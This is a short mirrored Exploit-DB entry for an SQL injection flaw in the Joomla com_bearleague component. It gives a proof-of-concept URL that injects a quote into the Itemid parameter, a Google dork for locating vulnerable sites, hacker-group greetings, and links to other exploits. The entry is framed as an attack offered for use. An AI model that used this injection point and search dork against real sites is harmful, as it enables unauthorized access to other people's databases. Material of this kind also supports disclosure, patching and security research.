Joomla! Component com_bearleague – SQL Injection

Exploit Database
12 阅读

作者： xDarkSton3x

日期： 2012-04-10
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/18729/

##################################################
# Exploit Title: joomla component (com_bearleague) SQL injection Vulnerability
# Date: 10/04/2012
# Author: xDarkSton3x
# E-mail : xdarkston3x@msn.com
# Category:: webapps
# Google dork: inurl:com_bearleague
# Vendor: http://beardev.com/component/joobb/topic/220-BearLeagueforSnookerorindividualSports.html
# Tested on: linux + windows
##################################################

[~]Exploit/p0c :
http://site.com/index.php?option=com_bearleague&task=team&tid=8&sid=1&Itemid=%27

Greetz [ Rs4 - B4nz0k - FailRoot - FailSoft - W4rn1ng] - [ Malandrines Team-DiosdelaRed.Com - RemoteExecution ] [ Dedalo - Maztor ]

last Exploits
Joomla! Component com_bearleague – SQL Injection的更多信息

Joomla! 1.6.0 Alpha2 – Cross-Site Scripting：
ALPHA CMS – Local File Inclusion：
Advanced Electron Forum 1.0.9 – Remote File Inclusion / Cross-Site Request Forgery：
WordPress Theme Bonus 1.0 – ‘s’ Cross-Site Scripting：
CiviCRM 3.3.3 – Multiple Cross-Site Scripting Vulnerabilities：
D-Link Central WiFiManager Software Controller 1.03 – Multiple Vulnerabilities：
Alstrasoft AskMe Pro 2.1 – ‘que_id’ SQL Injection：
Prima FlexAir Access Control 2.3.38 – Remote Code Execution：